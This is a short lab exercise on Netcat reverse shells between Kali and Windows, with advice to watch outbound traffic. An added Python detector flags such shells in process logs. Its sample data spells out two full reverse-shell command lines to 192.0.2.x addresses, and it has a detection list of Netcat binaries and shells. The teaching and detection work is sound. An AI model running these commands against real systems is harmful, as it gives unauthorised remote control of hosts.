NETCAT REVERSE SHELL
- Layout topology for this exercise:
- In this case Netcat is used for remote administration, sending a reverse shell to a listening host. A reverse shell would be useful when a router or firewall is present between the two hosts.
- Because the remote shell is sent outward across a corporate router or firewall, this is a reminder that outgoing traffic from a network should be watched as carefully as incoming traffic.
3.1 - Reverse shell from Kali to Windows
- Windows is listening on port 4444:
- Kali sends a reverse shell (-e /bin/bash) to port 4444 on Windows, meaning that the shell's stdin, stdout and stderr are redirected to Windows instead of the default console:
- As a consequence, once the connection is established, Windows has a command shell on Kali and can administer it remotely:
3.2 - Reverse shell from Windows to Kali
- In the same way as before, Kali is now listening on TCP port 4444:
- Windows sends a reverse shell (-e cmd.exe) to port 4444 on Kali:
- As a consequence, Kali is able to administer Windows remotely, because a Windows command-line prompt is opened in its own console:
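The advice above about watching outgoing traffic can be paired with host-side detection of the two patterns shown in 3.1 and 3.2. The following is an added example, not part of the original exercise: it flags process-creation records in which a Netcat client hands a shell (-e /bin/bash, -e cmd.exe) to an outbound connection. The record format, host names, tool path and 192.0.2.x addresses are constructed for illustration, and the extra binary and shell names in the sets are assumptions.

```python
import re
import shlex

# Netcat binary names and shells to flag. bash and cmd.exe are the page's; the rest are assumed.
NETCAT = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "nc.traditional"}
SHELLS = {"bash", "sh", "cmd.exe", "powershell.exe"}

def base(path):
    """Lower-cased file name of a Unix or Windows path, surrounding quotes removed."""
    return re.split(r"[\\/]", path.strip("\"'"))[-1].lower()

def reverse_shell(cmdline):
    """Return {'shell', 'host', 'port'} when a netcat client hands a shell to an
    outbound connection; None for listeners and ordinary clients."""
    try:
        argv = shlex.split(cmdline, posix=False)  # posix=False keeps C:\ backslashes
    except ValueError:
        return None
    if not argv or base(argv[0]) not in NETCAT:
        return None
    program, positional, listening = None, [], False
    args = iter(argv[1:])
    for arg in args:
        short = re.fullmatch(r"-[A-Za-z0-9]+", arg)  # short flag cluster such as -nv
        if arg == "--listen" or (short and "l" in arg):
            listening = True
        if arg in ("--exec", "--sh-exec") or (short and arg[-1] in "ec"):
            program = next(args, None)  # the program attached to the socket
        elif not arg.startswith("-"):
            positional.append(arg)
    if program is None or listening or len(positional) < 2:
        return None
    if not positional[-1].isdigit() or base(program.split()[0]) not in SHELLS:
        return None
    return {"shell": base(program.split()[0]), "host": positional[-2],
            "port": int(positional[-1])}

# Constructed process-creation records (host, command line); 192.0.2.0/24 is a documentation range.
SAMPLE = [
    ("kali", "nc -nv 192.0.2.10 4444 -e /bin/bash"),
    ("win10", r"C:\tools\nc.exe -nv 192.0.2.20 4444 -e cmd.exe"),
    ("kali", "nc -nlvp 4444"),              # plain listener, no shell attached
    ("win10", "nc.exe -nv 192.0.2.20 80"),  # ordinary client connection
]

def scan(events):
    """Return one alert per event whose command line is a netcat reverse shell."""
    return [dict(hit, source=host) for host, cmd in events if (hit := reverse_shell(cmd))]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Matching on the command line catches only unrenamed binaries with these flags, so it complements egress monitoring on the firewall and does not replace it.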